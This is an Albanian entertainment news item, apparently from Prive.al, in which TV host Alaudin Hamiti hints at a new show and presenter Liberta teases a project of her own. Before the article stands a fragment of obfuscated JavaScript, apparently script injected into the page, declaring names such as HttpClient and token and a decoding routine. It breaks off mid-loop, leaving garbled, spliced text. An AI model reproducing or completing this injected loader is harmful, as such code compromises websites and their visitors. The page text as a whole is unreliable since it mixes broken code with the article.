;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Alaudini paralajmëron emision, Liberta: “Viti i ri vjen më herët”

By

Në gusht të vitit që lamë pas, përmbylli ciklin e tij tejet të suksesshëm emisioni “NIN” në Klan Kosova, që shoqëroi shikuesit për gjashtë sezone rresht.

Nga ajo periudhë, moderatori Alaudin Hamiti ka qenë më i angazhuar prapa kamerave në pjesën drejtuese të ArtMotion dhe Klan Kosova.

Mirëpo, pa shumë zhurmë, puna për projekte të reja duket të mos ketë munguar.

Këtë e ka lënë të nënkuptohet Alaudini në disa postime në InstaStory, në bashkëbisedim me Libertën.  I pyetur nga ndjekësit se a po rikthehet me emision të ri, moderatori thotë se “po shpreson që po, pas verës në sezonin e ri televiziv”.

Ndërkaq, një nga ndjekësit i thotë se ka thashetheme se ai dhe Liberta po sjellin diçka të përbashkët, në të cilën Hamiti u përgjigj duke konfirmuar se të dy po punojnë në projekte të reja por jo bashkë.

Përgjigjen e moderatorit e ka ndarë edhe Liberta në llogarinë e saj në Instagram ku shton se “Ka me ardhë viti i ri pak ma herët sivjet”.

Se çfarë po përgatitet për shikuesit do të duhet të presim edhe pak për ta zbuluar, por një gjë është e sigurt, Liberta dhe Alaudini nuk zhgënjejnë asnjëherë! /Prive.al

Artikuj të ngjashëm